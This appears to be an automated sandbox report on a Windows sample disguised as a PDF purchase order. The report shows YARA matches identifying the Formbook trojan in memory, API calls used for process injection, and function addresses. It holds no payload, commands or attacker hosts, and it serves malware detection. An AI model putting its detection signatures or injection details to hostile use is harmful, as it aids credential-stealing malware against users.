          Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: PO-230821_pdf.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: PO-230821_pdf.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: control.exe PID: 6216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: initial sampleStatic PE information: Filename: PO-230821_pdf.exe
          Source: PO-230821_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO-230821_pdf.exe.2470000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PO-230821_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.PO-230821_pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO-230821_pdf.exe.2470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3555201775.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3579059104.00000000047A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1089258487.0000000002470000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.3619293935.00000000113AE000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1177156109.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.1174806021.0000000000990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.3575195181.0000000003030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: PO-230821_pdf.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: PO-230821_pdf.exe PID: 7148, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: control.exe PID: 6216, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_100063320_2_10006332
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_024508B70_2_024508B7
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 0_2_02450A3B0_2_02450A3B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041D9562_2_0041D956
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041E5662_2_0041E566
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041D5AC2_2_0041D5AC
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00409E4B2_2_00409E4B
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00409E502_2_00409E50
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041EF082_2_0041EF08
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3B0902_2_00A3B090
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1F0D22_2_00A1F0D2
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A200602_2_00A20060
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A7705A2_2_00A7705A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A4B1B02_2_00A4B1B0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AEF1802_2_00AEF180
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A351702_2_00A35170
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A1D2AC2_2_00A1D2AC
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A3E2E02_2_00A3E2E0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00AFA3762_2_00AFA376
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A213402_2_00A21340
          Source: C:\Windows\explorer.exeCode function: 3_2_108240823_2_10824082
          Source: C:\Windows\explorer.exeCode function: 3_2_1082D0363_2_1082D036
          Source: C:\Windows\explorer.exeCode function: 3_2_108315CD3_2_108315CD
          Source: C:\Windows\explorer.exeCode function: 3_2_10825D023_2_10825D02
          Source: C:\Windows\explorer.exeCode function: 3_2_1082B9123_2_1082B912
          Source: C:\Windows\explorer.exeCode function: 3_2_1082E2323_2_1082E232
          Source: C:\Windows\explorer.exeCode function: 3_2_10828B323_2_10828B32
          Source: C:\Windows\explorer.exeCode function: 3_2_10828B303_2_10828B30
          Source: C:\Windows\explorer.exeCode function: 3_2_113962323_2_11396232
          Source: C:\Windows\explorer.exeCode function: 3_2_11390B303_2_11390B30
          Source: C:\Windows\explorer.exeCode function: 3_2_11390B323_2_11390B32
          Source: C:\Windows\explorer.exeCode function: 3_2_113939123_2_11393912
          Source: C:\Windows\explorer.exeCode function: 3_2_1138DD023_2_1138DD02
          Source: C:\Windows\explorer.exeCode function: 3_2_113995CD3_2_113995CD
          Source: C:\Windows\explorer.exeCode function: 3_2_113950363_2_11395036
          Source: C:\Windows\explorer.exeCode function: 3_2_1138C0823_2_1138C082
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: String function: 00A1B8D0 appears 35 times
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A350 NtCreateFile,2_2_0041A350
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A400 NtReadFile,2_2_0041A400
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A480 NtClose,2_2_0041A480
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A530 NtAllocateVirtualMemory,2_2_0041A530
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A34A NtCreateFile,2_2_0041A34A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A3FA NtReadFile,2_2_0041A3FA
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A47A NtClose,2_2_0041A47A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_0041A52A NtAllocateVirtualMemory,2_2_0041A52A
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A629C0 NtReadFile,LdrInitializeThunk,2_2_00A629C0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62AE0 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_00A62AE0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62A50 NtClose,LdrInitializeThunk,2_2_00A62A50
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62B90 NtQueryInformationToken,LdrInitializeThunk,2_2_00A62B90
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62B60 NtFreeVirtualMemory,LdrInitializeThunk,2_2_00A62B60
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62CE0 NtQuerySystemInformation,LdrInitializeThunk,2_2_00A62CE0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62CC0 NtDelayExecution,LdrInitializeThunk,2_2_00A62CC0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62C20 NtUnmapViewOfSection,LdrInitializeThunk,2_2_00A62C20
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62C00 NtMapViewOfSection,LdrInitializeThunk,2_2_00A62C00
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62D90 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_00A62D90
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62D70 NtReadVirtualMemory,LdrInitializeThunk,2_2_00A62D70
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62EA0 NtResumeThread,LdrInitializeThunk,2_2_00A62EA0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62E80 NtProtectVirtualMemory,LdrInitializeThunk,2_2_00A62E80
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62ED0 NtCreateFile,LdrInitializeThunk,2_2_00A62ED0
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A62E20 NtCreateSection,LdrInitializeThunk,2_2_00A62E20
          Source: C:\Users\user\Desktop\PO-230821_pdf.exeCode function: 2_2_00A64230 NtSetContextThread,2_2_00A64230
          Source: C:\Windows\explorer.exeCode function: 3_2_11396232 NtCreateFile,3_2_11396232
          Source: C:\Windows\explorer.exeCode function: 3_2_11397E12 NtProtectVirtualMemory,3_2_11397E12
          Source: C:\Windows\explorer.exeCode function: 3_2_11397E0A NtProtectVirtualMemory,3_2_11397E0A
          Source: PO-230821_pdf.exe, 00000000.00000003.1081091195.000000000350D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
          Source: PO-230821_pdf.exe, 00000000.00000003.1061552946.0000000003333000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
          Source: PO-230821_pdf.exe, 00000002.00000002.1175067955.0000000000B1D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO-230821_pdf.exe
